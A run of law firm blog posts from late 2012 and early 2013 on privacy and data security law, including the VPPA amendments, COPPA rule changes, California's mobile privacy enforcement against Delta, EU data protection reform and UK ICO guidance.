On January 10, 2013, President Obama signed the Video Privacy Protection Act Amendments Act of 2012 (“VPPAA”), which makes it easier for companies to obtain consumer consent to share video viewing information. At the same time, the amendment left in place many of the pitfalls traditionally associated with the VPPA, and added some new ones.

More specifically, the VPPAA makes the following changes:

1. Consent Via Internet: It clarifies that a company can obtain informed, written consent to disclose the consumer’s video viewing information through electronic means, such as by the consumer signing an agreement over the Internet
2. Consent Must Be Separate And Distinct: It requires that such consent be in a form “distinct and separate” from any form setting forth other legal or financial obligations of the consumer
3. Consent Can Be Given In Advance: It allows consent to be given in advance for a set period of time, not to exceed two years, or until consent is withdrawn by the consumer, whichever is sooner
4. Consent Can Be Withdrawn: It requires the company to provide an opportunity for the consumer to withdraw consent on a case-by-case basis, or to withdraw from ongoing disclosures, at the consumer's election

Previously, the VPPA had not allowed for advanced consent to sharing. Since all disclosures had to be consented to “at the time” of disclosure, companies could not even obtain consent to sharing video history by way of their account formation documents or terms of use. Because of this Amendment, it is now possible for video content platforms to obtain valid, upfront consent from all of their customers to share individual video viewing histories with third parties. Properly done, this could result in a substantial benefit both to the sharing company and to the consumer, who will receive more highly personalized marketing offers. And, consumers will retain an opt-out as of right.

But this benefit is not without its dangers. The Amendment imposes many requirements both for obtaining advance consent and for allowing revocation of consent. Many nuts-and-bolts questions concerning how to meet these requirements are left unanswered by the plain text of the amendment. When is a consent form sufficiently “separate and distinct”? Can a company require consent for video history sharing as a take-it-or-leave-it term of using the service at all? What does it mean that the customer must be allowed to withdraw consent “on a case-by-case basis”? Given that the VPPA provides for a private cause of action, statutory penalties of $2,500 per person, attorneys’ fees, and punitive damages, any failure to comply with these new consent provisions (which are surely not defined by case law yet), could expose a company to significant liability.

All companies looking to take advantage of this Amendment should carefully consider the design and operation of its consent mechanisms, drawing not only from the Act, but from all relevant sources of guidance as well.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Joshua B. Marker, Steven Boranian, and Timothy Nagle.

With the start of the new year, California has continued its push to take a leadership role in the realm of mobile privacy. The attorney general’s office recently released a mobile privacy best practices document, “Privacy On The Go: Recommendations For The Mobile Ecosystem,” designed to help all actors in the mobile environment understand and incorporate privacy principles from the outset. As with last year’s agreement with the application platform companies, this document aims to increase privacy compliance through voluntary participation. This is in contrast to the enforcement action, which we previously wrote about, filed by the attorney general against Delta Airlines last month.

The report has recommendations for all participants in the mobile ecosystem, including the application platform providers, advertising networks, operating system developers, and mobile carriers. But its main focus is on application developers, those individuals or companies who are actually developing the applications with which consumers interact directly.

The recommendations made are generally at a high-level, and reinforce principles that have been introduced over the past few years, including privacy-by-design, and accessibility of a privacy policy within the application itself. In order to incorporate privacy from the outset, it is suggested that a developer should start with a “data checklist.” This checklist is a series of questions that any person or company developing an application should be asking at the beginning of the process: What type of data is the application collecting? Is this data necessary for the application’s basic functionality? How is the data used and stored?

Additionally, the report acknowledges that its recommendations go beyond what the minimum legal requirements are today, and provides a glimpse of where privacy principles are headed. For example, the report introduces a concept referred to as “surprise minimization,” which essentially means that an application should minimize any unexpected privacy practices, such as the collection of information not needed for the application’s functionality. Beyond just the existence of a privacy policy, the report suggests using an easy-to-understand format, such as a layered privacy notice, or a “nutrition label for privacy.” Further, you may want to consider the use of special notices that are presented when the application uses or collects information that is outside of what is required for basic functionality, such as geo-location data. Finally, the report reflects an ever-expanding definition of personally identifiable information, some of which is unique to the mobile ecosystem, including unique device identifiers, and geo-location data, as well as a history of applications downloaded or used.

California’s best practices document provides much more information, and is a quick but useful read for any company that has, or will have, a consumer-facing mobile application. At the very least, it will provide you with the right questions to ask to ensure mobile privacy compliance in California.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Timothy J. Nagle.

An earlier blog post analyzed a draft Executive Order on critical infrastructure cybersecurity. A newer version of the order is similar to its predecessor, but the ultimate goals remain: using existing regulatory authority, improving information sharing, developing a “voluntary” framework of standards, incentivizing (or punishing?) owners and operators of critical infrastructure, and protecting privacy and civil liberties. All owners and operators may be impacted, but those that are specifically targeted by threats, or that present catastrophic consequences if their function is interrupted, should expect to change their business and compliance processes.

Please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Gunjan Talati and Timothy Nagle.

The 2013 National Defense Authorization Act (“NDAA”) became the law of the land in early January. This NDAA contains a notice requirement that follows the government trend of the past few years of being required to tattle on yourself. Specifically, the NDAA directs the Department of Defense (“DoD”) to create notice requirements that mandate notification by “cleared” defense contractors to the government if covered networks are successfully penetrated.

A lot of uncertainty surrounds how the DoD will implement these notice requirements and exactly what they will cover. The NDAA explains that the Under Secretary of Defense for Intelligence (in conjunction with other enumerated officials) “shall establish the criteria for designating the cleared defense contractors’ networks or information systems that contain or process information created by or for the [DoD] to be subject to the reporting [requirements].” Thus, the NDAA gives the DoD significant discretion in determining what networks and systems will be covered, and whether unclassified networks and systems will be included.

The NDAA also gives the DoD broad discretion with the procedure for reporting, requiring only that the reporting be “rapid.” The NDAA does, however, outline certain elements a report must have, such as how the system was penetrated, and a sample of the malicious code if available.

The law also requires the DoD to establish a process that gives DoD personnel the authority to access “equipment or information of a contractor necessary to conduct a forensic analysis” to determine if any DoD information was “exfiltrated” by the hack. While the language of the statute appears to limit the access of the DoD to simply determining if information was “exfiltrated,” the actual procedures proposed by the DoD may be a different story. If the DoD drafts procedures that go beyond just determining what was “exfiltrated,” companies will have to grapple with a number of issues, such as the inadvertent release of trade secrets, DoD access to privileged records, and attorney/client communications. As is almost always the case, the true devil will be in the details.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On 19 December 2012, following years of assessment and culminating in positive recommendations by two specialist EU Committees, the European Commission formally announced that New Zealand’s data protection standards are compatible with those of the EU, and that they ensure “adequate protection” of personal data under the European Data Protection Directive 95/46/EC. Vice-President Viviane Reding, the European Commissioner for Justice, Fundamental Rights and Citizenship, declared that the decision paved the way to boosting trade with the EU’s international partners, while helping to set high standards for personal data protection at a global level.

Under the European Data Protection Directive, transfers of personal data to countries outside the European Economic Area that are not considered to provide “adequate protection” of personal data are subject to strict conditions under which adequate safeguards must be put in place in order to allow for the international transfer. This finding of adequacy will therefore allow personal data to flow from the 27 EU member states to New Zealand for processing without any further safeguards being necessary.

To date, the European Commission has recognised Andorra, Argentina, Australia, Canada, Faeroe Islands, Guernsey, Israel, Isle of Man, Jersey, New Zealand, Switzerland and Uruguay, and the United States’ Safe Harbor scheme, as providing adequate protection.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Timothy J. Nagle.

On December 21, 2012, the Comptroller of the Currency issued Alert 2012-16 regarding “Distributed Denial of Service (DDoS) Attacks and Customer Account Fraud.” The Alert was in response to a recent series of attacks against national banks and federal savings associations by “various sophisticated groups.” It provides a general description of the attacks and recommendations for appropriate risk management measures. Financial institution clients should pay particular attention to comments in the Alert regarding staffing, vendor due diligence, reporting to law enforcement, and the need for effective communication with customers.

A DDoS attack does not, by itself, constitute a security breach. Rather, it interrupts or severely degrades Internet access, particularly to online banking sites. However, a DDoS attack is frequently accompanied by “account takeover” fraud while the bank is focused on responding to the DDoS event. The Alert emphasizes the need for “a heightened sense of awareness” to prepare for and respond to these attacks, which show no sign of diminishing in frequency or sophistication. Preparations may include reviewing staffing requirements, contracting with third-party servicers to assist in managing the Internet traffic flow, and conducting due diligence reviews of vendors – such as Internet Service Providers and website hosting companies – to ensure they have taken adequate steps to address this threat.

Another aspect of DDoS preparation and response is sharing information with other banks and service providers, either directly or by participating in organizations such as the Financial Services Information Sharing and Analysis Center (FS-ISAC). Banks are also expected to report attacks to law enforcement and regulators, as well as file Suspicious Activity Reports if critical information or systems are impacted. Possibly the most important action during a DDoS event, as identified by the Comptroller of the Currency, is “timely and accurate communication to...customers regarding Web site problems, risks to customers, precautions customers can take, and alternate delivery channels that will meet their banking needs.” This admonition may have been in response to media reports of customers who expressed frustration with financial institutions for a perceived failure to notify them of the possibility that online banking and other websites may be impacted.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Brad M. Rostolsky and Nancy E. Bonifant.

As the year is coming to an end, the industry is speculating the release date of the Health Information Technology for Economic and Clinical Health Act (“HITECH”) final rule. The final rule is expected to address modifications to the Privacy, Security, Enforcement, and Breach Notification Rules, and with the release date yet to be determined, it is important for Covered Entities and Business Associates to be prepared for the upcoming changes.

Please click here for a more detailed analysis on our sister blog, Life Sciences Legal Update.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John P. Feldman and Frederick Lah.

Earlier today, FTC Chairman Leibowitz announced the agency’s update to the COPPA rule at a press conference alongside Sens. Jay Rockefeller (D-W.Va.) and Mark Pryor (D-Ark.), and Congressmen Ed Markey (D-Mass.) and Joe Barton (R-Tex.). The changes to COPPA were two years in the making and were the result of two proposed rule revisions and comment periods. As anticipated, the new rule comes with a broadened scope. Sen. Rockefeller provided the opening remarks to the press conference, expressing his approval that the new COPPA rule “captures the new online reality” to address the rise of social networks, smartphones, tablets, and apps. Some highlights from the new COPPA rule include:

• Expanded scope of personal information – the collection of which requires parental notice and consent – to include geolocation information, photographs, and videos. The chairman noted that this kind of information can be used to cause physical harm to children.
• Expanded scope of personal information to also include persistent identifiers, such as mobile device unique identifiers and IP addresses, to the extent they can recognize users over time and across different websites. Chairman Leibowitz noted that these types of information can be used to build massive profiles by behavioral marketers. The definition would not be extended to include persistent identifiers if they are used for the sole purpose of supporting the site or its internal operations.
• Closed a “loophole” that allowed covered websites or online services to permit third parties to collect personal information through plug-ins or ad networks that the covered websites or online services would not have otherwise been allowed to collect without parental consent. Third-party collectors are now also required to comply with COPPA if they have “actual knowledge” of the child-directed nature of the site from which they are collecting personal information. 
• Offer companies a “streamlined, voluntary and transparent” approval process for new ways of getting parental consent. The chairman encouraged companies to create additional “simple, low-cost means” of obtaining verifiable parental consent. 
• Strengthened data security protections by requiring that covered websites or online services take reasonable steps to release children’s personal information only to companies that are capable of keeping it secure and confidential.
• Strengthened requirement that covered websites or online services adopt reasonable procedures for data retention and deletion, and the FTC’s oversight of self-regulatory safe harbor programs.

Notably, the chairman said that advertisers can continue to advertise to children, but not behavioral advertising, without the consent of parents. The chairman bluntly stated: “Until and unless you get parental consent, you may not track children to build massive profiles for behavioral advertising principles. Period.”

The amendments are expected to come into effect July 1, 2013. Companies need to consider these amendments now, both with respect to their operations for websites and in the mobile space. This is especially true considering the FTC recent focus on children’s privacy in the mobile app environment. We will continue to follow this issue closely.  

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Katharina A. Weimer.

In a recent article for Privacy Laws & Business International Report, Reed Smith’s Katharina Weimer explains how to reach your customers now that the grace period for amendments to the German Data Protection Act has expired.

Please click here to continue reading.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John P. Feldman and Frederick Lah.

One day after the FTC issued its second report on privacy concerns with mobile apps for kids, "Mobile Apps for Kids: Disclosures Still Not Making the Grade", a consumer privacy group filed a complaint with the FTC against a mobile game-maker for alleged violations of COPPA.  The complaint, filed by the Center for Digital Democracy, alleged that the mobile game-maker was collecting children’s personal information through its mobile game without obtaining verifiable parental consent, and without providing the requisite notice under COPPA.

As actions continue to be brought under the current COPPA regime, we’re expecting the new COPPA rules to be issued any day now. In a recent interview, Chairman Leibowitz noted that he was "pretty sure" that the new COPPA rules would be finalized by the end of the year (while sounding less optimistic that a Do-Not-Track deal would be reached in the same time frame). We will continue to monitor this issue closely in the coming weeks.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John P. Feldman and Frederick Lah.

It continues to be a busy time in the world of mobile app privacy. Last week, we reported on the California attorney general bringing a mobile privacy enforcement action against Delta Air Lines. And just yesterday, the FTC issued its second staff report on the privacy practices of mobile apps for children, “Mobile Apps for Kids: Disclosures Still Not Making the Grade.”

This report reiterates some of the findings from the FTC’s first report on the privacy practices of mobile apps for children, “Mobile Apps for Kids: Current Privacy Disclosures are Disappointing.” The FTC continues to voice its dissatisfaction with the current privacy disclosures that companies are providing to parents, such as what type of data the app collects, who will have access to that data, how the data will be used, and who that data will be shared with. The FTC continues to believe that such disclosures should be provided prior to download since once an app is downloaded, the app may already be collecting the child’s information.

The basis of the second report was again a survey of approximately 400 apps, 200 each from the Apple and Google Play app stores. According to the survey, only 20 percent of the apps reviewed contained any privacy-related disclosures at all, whether on the app’s promotion page, on the developer website, or within the app. In addition, the FTC’s survey found that:

• 59 percent of the apps reviewed transmitted device ID, geolocation, or phone number to the developer, an advertising network, analytics company or other third party, yet only 11 percent of the apps disclosed that the app transmitted such data.
• 58 percent of the apps reviewed contained advertising within the app, yet only 9 percent disclosed that the app contained advertising.
• 22 percent of the apps reviewed contained links to social media, yet only 9 percent disclosed that fact.

The FTC intends to conduct another survey in the future, and they “expect to see improvement.” They noted that such discrepancies between a company’s privacy practices and disclosures could constitute violations of COPPA or the FTC Act. With the FTC’s continued focus in this area and the proposed COPPA rules expected to be implemented shortly, we anticipate that the intersection between mobile apps and children’s privacy will continue to draw heightened regulatory scrutiny. In the meantime, we recommend that companies operating in the mobile space (especially those providing apps for children) review and update their mobile app privacy disclosures now before they become the next enforcement target.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond, Mark Melodia and Cynthia O'Donoghue.

The International Association of Privacy Professionals hosted its first KnowledgeNet in New Jersey December 6, 2012, at the Princeton offices of Reed Smith. Reed Smith attorneys Mark Melodia and Paul Bond presented a seminar on “Understanding and Defending Big Data” to the gathering of dozens of privacy attorneys and privacy compliance professionals from around the state. Participants discussed what Big Data means to them, as well as how Big Data solutions are being deployed in their respective industries, including financial services, health care, energy, and education. This KnowledgeNet, organized by Miranda Alfonso-Williams, Global Privacy Leader, GE Healthcare, promises to be the first of many for the growing privacy community of the Garden State.

In October, Reed Smith hosted a Silicon Valley event on “Big Data Monetization.” Video of the presentations from that panel, including Mark, and Data Privacy, Security & Management Group co-chair Cynthia O’Donoghue, are available here.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Steven Boranian, Joshua Marker and Paul Bond.

Following a year in which she repeatedly announced her intention to make mobile privacy a priority, California Attorney General Kamala Harris filed the first mobile privacy enforcement action against Delta Air Lines. The case, The People Of The State Of California v. Delta Air Lines, CGC-12-526741, filed in San Francisco Superior Court December 6, 2012, alleges violations of California’s Unfair Competition Law based upon Delta’s alleged failure to comply with California Online Privacy Protection Act (“CalOPPA”). With potential statutory penalties of $2,500 per violation, the stakes are sky high.

Delta had received a letter from the attorney general’s office in late October notifying the company of non-compliance with CalOPPA, and giving it 30 days to become compliant. In particular, the letter noted that the Fly Delta app “does not have a privacy policy reasonably accessible for consumers.” With the expiration of the 30-day period, the attorney general wasted no time in filing the current action. While the case is notable for being the first mobile privacy enforcement action, it is equally notable for the violations that it alleges.

The primary allegations are twofold. First, the complaint repeats the allegation of the letter, that Delta does not have a privacy policy for its mobile application that is readily accessible to the consumer in the application or on the platforms from which it could be downloaded, an alleged CalOPPA violation in its own right. Second, the complaint alleges that neither the presence, nor the substance, of the Delta website privacy policy is sufficient for compliance with CalOPPA with respect to the mobile application. Critically, the complaint alleges that “while the privacy policy on Delta’s website describes some of the PII collected on their website, Delta does not disclose anywhere several types of PII that the Fly Delta app collects, but the Delta website does not collect.” In short, the attorney general is not just paying attention to the presence of the privacy policy, but also the content and the information practices unique to the mobile environment.

Any company that has a consumer-facing mobile application should take note. Per the attorney general, every mobile application that collects personally identifiable information must have a privacy policy that is readily available to the consumer on the platforms on which the application is available for download, and within the application itself. Just as important, the attorney general is urging that each privacy policy must disclose the information-collection and sharing practices of the mobile application specifically, and that it is not sufficient to simply link to the website privacy policy. Information-collection practices often vary between website and mobile applications, and the privacy policy must be an accurate reflection of the information-collection and sharing practices in the application.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Viviane Reding, Vice-President of the European Commission, EU Justice Commissioner, told ministers from the European Union Member States at a Justice and Home Affairs Council meeting in Luxembourg that in an effort not to overburden small and medium-sized enterprises (SMEs), she is prepared to offer them some concessions under the revised EU Data Protection Regulation.

SMEs are currently exempt from certain requirements, including the appointment of a data protection officer, but the Commission is prepared to consider broadening this exemption to other areas through an approach that takes into account the amount and sensitivity of the data processed. The proposal further elucidates the Commission's intention to not apply the same rules to “the small hairdresser as to a multinational.”

Reding emphasised that the Commission would not fall into the trap of some lobbyists expressing concerns for SMEs, but in fact referring to provisions designed to help large multinational firms.

In her speech, the Commissioner also referred to the proposed implementing and delegated acts, expressing that they are not designed to be considered a “blank cheque” for the Commission. Instead, Reding suggested she would consider reviewing them one-by-one with member states to ensure they are limited to what is truly necessary.

Reding also hinted that there may be different rules for the private and public sectors, by advocating the need for greater flexibility, even though the consensus is to stick to the status quo of having the same rules apply to both. However, Reding stated that “specific rules are necessary in certain circumstances such as the land registry which should be public.” But she warned that “there can be no general exemption for the public sector.”

It’s looking increasing unlikely that the EU Data Protection Regulation will be revised and ready for a vote during the first quarter of next year, despite the Irish Presidency’s hope to get it on the agenda for February 2013.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Justice Committee has laid out its concerns in its opinion on the European Commission’s legislative proposals (the Proposal) for reform of the European Data Protection Framework. In forming its judgement, the Justice Committee heard evidence from: the Ministry of Justice, the Information Commissioner’s Office, the EU Commission, the police, and representatives of UK small and medium enterprises (SMEs) and global businesses.

Whilst accepting that the proposed Regulation is necessary to update the original 1995 Directive to take into account technological change and to confer on individuals their new rights and freedoms, the Committee criticized its “over-prescriptive” nature and called for changes to be made.

A fundamental concern for the Committee was the division of the Proposal between a Regulation for all, and law enforcement which would be governed by national implementing legislation stemming from the proposed Directive. The Committee felt that this could “cause confusion for data subjects and in particular for organisations within the criminal justice system”, as well as a lack of consistency resulting from a weakness in the proposed Directive as compared with the proposed Regulation. The Committee strongly urged the Commission to choose between either focussing on elements essential to harmonisation under a Regulation, or using a Directive to allow implementation by Member States which would provide greater flexibility in implementation and enforcement at the cost of harmonisation and consistency.

The Committee also opined on a number of crucial provisions within the framework, broadly supporting the “right to be forgotten” but warning that using the word "forgotten" could create unrealistic expectations, especially for users of social media. Individuals’ right to access their own data was also a point of contention, with the Committee recommending that the proposed Regulation should ban any fee for data access requests. Furthermore, the Committee has suggested that the requirement to appoint a Data Protection Officer for those organisations with more than 250 employees should be changed to take into account the type of business and the sensitivity of data that is handled, rather than the number of employees.

The Justice Committee agreed with the criticism levelled at the Commission’s Impact Assessment, which failed to account for additional compliance costs that may be incurred by organisations, although the Committee acknowledged that the new Data Protection Framework had the potential to increase competitive advantage through increased consumer confidence.

Overall the Committee agreed that the Regulation does give data subjects essential rights and has the potential to make data protection compliance easier for businesses, especially SMEs, after EU Justice Commissioner Viviane Reding recently announced that she is prepared to offer them some concessions under the framework. However, the Committee does not believe that in its current form it will produce a proportionate, practicable, affordable or effective system of data protection in the EU.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Information Commissioners Office (ICO) has published a public consultation on changes to the notification process for organisations processing personal data. Currently data controllers are required to submit and annually renew their notification with the ICO, describing the purposes of their personal data processing according to standard definitions.

In an attempt to simplify the notification process, the ICO is consulting the public and data controllers on the following proposed changes:

• introducing an online and telephone service for the payment and renewal of notification fees;
• identifying in the notification form the contact details the data controller would like the public to use when requesting information or submitting other data protection enquiries; and
• introducing a narrative-based approach in relation to the purposes of processing where a data controller will be able to describe in their own words how they process personal data.

Although certain standard templates will still be available, the move towards a narrative-based approach is considered by the ICO as the best way to make the “public register more helpful and accessible.”

There are several concerns with a narrative approach, such as it being more onerous on data controllers and it leading to a lack of consistency between data controllers thus resulting in confusion for individuals. The consultation closes 30 November.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner's Office (ICO) has published a code of good practice on managing the risks related to anonymisation. Christopher Graham, UK Information Commissioner, believes this to be the first code of practice on anonymisation to be published by any European data protection authority, but Liechtenstein published a guide on anonymisation and pseudonymisation earlier this year.

With publicly available data increasing rapidly and the rise of “big-data,” anonymisation is an important tool in “helping society to make rich data resources available whilst protecting individuals’ privacy.” It is considered to be of particular value for organisations that want to publish data for research purposes.

The Code was issued pursuant to Recital 26 of the European Data Protection Directive (Directive 95/46/EC), which provides that “the principles of protection shall not apply to data rendered anonymous in such a way that the data subject is no longer identifiable.” Data that is properly anonymised ensures that an individual can no longer be identified, resulting in such data falling outside the European data protection laws. Anonymisation is not, however, always straightforward since individuals may be identified in a number of ways which can lead to the possibility of re-identifying individuals from a combination of anonymised data and data aggregated from other sources. The ICO recognises the difficulty in determining whether anonymised data is still classified as personal data and believes a sensible judgment should be made in the circumstances.

The Code recommends that data controllers perform regular risk assessments on the likely occurrence of re-identification since that risk may change over time. It further warns that even if anonymisation is carried out effectively, it does not necessarily protect personal data from being re-identified in the future. In borderline cases where there is uncertainty about whether re-identification can occur, organisations are urged to seek the individual’s consent for disclosure and to adopt a more rigorous form of risk analysis and anonymisation.

Disclosure of anonymised data does not require consent, according to the ICO, “provided there is no likelihood of anonymisation causing unwarranted damage or distress then there will be no need to obtain consent as a means of legitimising the processing.” The ICO also acknowledged that consent can be not only onerous but potentially impossible to obtain, and even if obtained, the ICO generally considers it safer to use or disclose anonymised data.

The Information Commissioner does suggest an added layer of bureaucracy and cost of organisations, however, by suggesting that risk assessment strategies form part of an organisation’s wider governance structure with the appointment of a “Senior Information Risk Owner” who would be responsible for authorising and overseeing the anonymisation process.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O’Donoghue.

Shri Anand Sharma, Union Minister for Commerce, Industry & Textiles in India, emphasised, at a bilateral meeting with the European Commissioner for Taxation and Customs Union, that in order for the Bilateral Trade and Investment Agreement (BTIA) between the EU and India to be successful, India must be declared an adequate country for data transfers.

Shri Sharma indicated that India wishes to boost bilateral trade with the EU, seeking greater market access to the lucrative services sector. The Minister illustrated India’s strong investment appeal through its flexible Foreign Direct Investment (FDI) conditions, which have led to FDI inflows of $46 million since last year, an increase of nearly 35%.

The European Union is currently in the process of determining whether India’s laws meet an adequate level of data protection as stipulated by the EU Data Protection Directive. Shri Sharma acknowledged that India’s existing law does not meet the required EU standards, and he urged that the situation be rectified promptly in the wake of “almost all the major Fortune 500 companies (having) trusted India with their critical data”.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On October 17, 2012, Colombia enacted a new Data Protection Law which will regulate data collection and processing of personal data both within the Colombian territory and extraterritorially.

The law generally follows the EU approach including, amongst other provisions, cross-border data transfer restrictions where the destination country’s data protection is not deemed “adequate”, as well as the requirement for express and informed consent prior to processing of personal data.

The new law also prohibits processing special categories of data, including sensitive personal data, which has the same definition as within the EU, but adds a new category of ‘Minors and Teenage’ data, unless that data is deemed to be in the public domain.

Organisations have a period of six months from the date of enactment before they must be compliant with Colombia’s new data protection law.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Frederick H. Lah and Douglas J. Wood.

Last week, the U.S. District Court approved the $22.5 million civil penalty against Google for violating a consent order. Yesterday, FTC Director of the Bureau of Consumer Protection David Vladeck released a statement about the Court’s approval, calling the consent order “a clear victory for consumers and privacy” and demonstrating that the Commission “will continue to ensure that its orders are obeyed, and that consumers’ privacy is protected.” The consent order settled charges that Google misrepresented privacy assurances to users of Apple’s Safari Internet browser in violation of a previous FTC settlement Order.

Please click here to read the full post on our sister blog, AdLaw By Request.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The EU’s proposed EU Data Protection Framework encourages the use of privacy seals, certification mechanisms and trust marks. Any organisation which has obtained a privacy seal would be considered to have attained a ‘stamp of approval’, indicating good privacy standards.

Anticipating the development of data protection kite marks, the UK Information Commissioner’s Office has launched a questionnaire to help establish the best method of implementation of such a scheme, and how privacy seals may be used to improve data protection compliance and customer consumer awareness of data protection.

The questionnaire will gather the views of organisations on their general interest in the use of privacy seals, practical experiences they have with such schemes, and the potential commercial benefits, as well as any potential reservations they may have.

As with any type of kite mark, the use of privacy seals must be founded on a system that can be trusted and perceived as legitimate. In looking at some of the similar uses of such marks, their use should not be seen as nothing more than a formulaic paper exercise that is not always supported. Ideally, any kite marks developed and approved would also be attainable and recognised across the EU; otherwise they would be contrary to one of the main principles behind the draft EU Data Protection Regulation of increasing harmonisation.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

With a need for mobile access to data and the influx of innovative and affordable cloud computing products to global markets, organisations are shifting towards a greater use of the cloud. In response to its growing popularity, the Information Commissioner’s Office (ICO) has published guidelines on data protection compliance issues surrounding cloud computing. The practical guidelines not only provide a high-level analysis of how to apply data protection rules to cloud contracts, but also consider the various issues surrounding migration to the cloud and provide a checklist for those organisations adopting cloud services.

The distinction between data controller and data processor is of critical importance to data protection and can be complex in relation to cloud computing. The ICO helps navigate this issue by demonstrating data controller and processor roles in various scenarios. The cloud customer is generally considered the data controller as it determines the purposes and the manner in which any personal data are being processed. The ICO suggests that the precise role of the organisation that owns and operates the cloud service (“Cloud Provider”) should be reviewed in each case in order to determine whether or not it is processing personal data.

Data controllers, to remain compliant with the UK Data Protection Act, must consider the following key areas:

• Security
  • Assess personal data and the risk to that data by putting it into the cloud.
  • Obtain sufficient guarantees from the cloud provider about security measures. The ICO supports the use of industry-recognised standards.
  • Protect personal data in transit through use of encryption, especially where sensitive data is being processed.
  • Ensure measures are in place to prevent unauthorised access, including individual usernames and passwords for each cloud user.
  •  Institute a continual cycle of monitoring, review and assessment of the cloud provider’s security controls.
• Data Retention and Deletion
  • As most cloud providers are likely to have multiple copies of data stored in various locations for disaster recovery, cloud customers should ensure that all copies of personal data no longer required can be securely and timely deleted.
• Audit
  • If it is not possible to obtain audit rights because of shared cloud services, the ICO recommends an independent third party to avoid the need for each customer to conduct a separate audit.
  • The cloud provider should only be permitted to process personal data for specified purposes and not without the agreement of the cloud customer.
• Data Transfer
  • Cloud servers may be located outside the UK which can make it difficult to establish where data is being processed. The cloud customer should therefore request from the cloud provider a list of countries where data will be processed and the safeguards in place in each location. Furthermore, the cloud provider should explain when data will be transferred to the locations.

The ICO recognizes the benefit of cloud computing and this new guidance contains pragmatic suggestions to assist organizations in conducting due diligence on a cloud supplier, and in ensuring data protection compliance.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

At an Information Security Conference on 4 November 2012, the EU Commissioner for a Digital Agenda, Neelie Kroes, revealed plans to introduce legislation involving the implementation of a high level of network and information security across the EU, effectively extending the obligations to adopt risk management measures to private sector industries such as banking, energy, health and transport.

Cyber-security threats and vulnerabilities are increasing with businesses in virtually all sectors interacting with, and being dependant on, digital networks and infrastructure to provide their services, the Commissioner stated that cyber-security should be “on top of the agenda”. Commissioner Kroes stated that “web-based attacks went up 36% in the year 2011”, and a recent Eurostat survey revealed that only 26 percent of enterprises in the EU at the beginning of 2012 had a formally defined security policy with a plan for regular review.

Although networks and infrastructure are mainly privately owned and run, the Commissioner declared that there is a shared responsibility between the public and private sectors to address cyber-security, with the public sector needed to provide incentives and set the example for the private sector to follow.

International cooperation on cyber-security is one of the Commissioner’s key priorities, and she pointed to the approach to cyber-security adopted by the United States as the method to follow, declaring that “in the U.S. it has long obtained political attention.” The European strategy for cyber-security which Kroes plans to put forward aims to encourage demand for greater security and promote the competitiveness of the EU ICT industry, elevating cyber-security on the political agenda whilst continuing to promote the “EU core values and fundamental rights, including freedom of expression and access to information, as well as data protection and privacy.”

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

CESG, the Information Assurance arm of UK Government Communications Headquarters (GCHQ), in collaboration with the Centre for the Protection of National Infrastructure (CPNI), has launched a new initiative called ‘Cyber Incident Response'. The scheme will offer organisations facing cyber threats the opportunity to contact companies certified to respond effectively to the consequences of cyber-attacks. The companies’ response role will be to analyse and then contain the incident, followed by a cleaning-up operation.

Currently, the pilot scheme comprises four companies including BAE Systems Detica, Cassidian, Context IS and Mandiant Corp. Each company was selected by CESG based on its expertise and experience in providing cyber response services. These companies will work in partnership with GCHQ, CPNI and the other companies to set the future standards for cyber response services. Currently the scheme is aimed at the public sector, but there is potential for it to be utilised in the private sector as the programme matures. There are also plans to develop and publish eligibility criteria so that other companies can become accredited when the programme is expanded into full service, which is expected by spring 2013.

Cyber Incident Response is intended to build on the “10 steps to cyber security” for which we posted a blog in September that provided guidance to organisations trying to prevent cyber vulnerabilities.

The introduction of the scheme comes at an opportune time for the UK as it faces on-going and persistent threats of increasingly sophisticated cyber-attacks. Detica earlier this year warned that there has been a tenfold increase in cyber-attacks since 2011, with the attacks coming from more cyber attackers and an increasing number of countries.

Chloe Smith, Minister for Cyber Security, declared that "the growing cyber threat makes it inevitable that some attacks will get through either where basic security is not implemented, or when an organisation is targeted by a highly capable attacker." She encouraged a joint response from organisations and industry to counter this and improve the cyber security of the UK.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (ICO) served a monetary penalty of £50,000 on Prudential, after Pru merged accounts of two people with the same name and same date of birth five years ago. The “mix-up” in administration of two accounts culminated in tens of thousands of pounds ending up in the wrong account. Despite repeated attempts to sort out the matter over a three-year period, the Pru continued to confuse the accounts and accountholders.

This is the first time the ICO has issued a monetary penalty for a breach of the Data Protection Act other than for loss of personal data. The ICO determined that the inaccuracies and failure to keep customer records up to date was a serious contravention of the Data Protection Act.

The ICO received more public complaints about data handling by the money lenders than any other sector. Around 15% of the nearly 13,000 data protection complaints related to concerns about the financial services sector, with inaccurate data the third most complained about issue across all sectors.

Stephen Eckersley, ICO head of Enforcement, stressed that “staff should also receive adequate training on how to manage and maintain [customer records], with any concerns fully investigated in order to ensure problems are addressed at an early stage.”

Prudential has co-operated with the ICO and has now updated its processes and implemented staff training to ensure greater accuracy of customer records.

• Print
• Comments
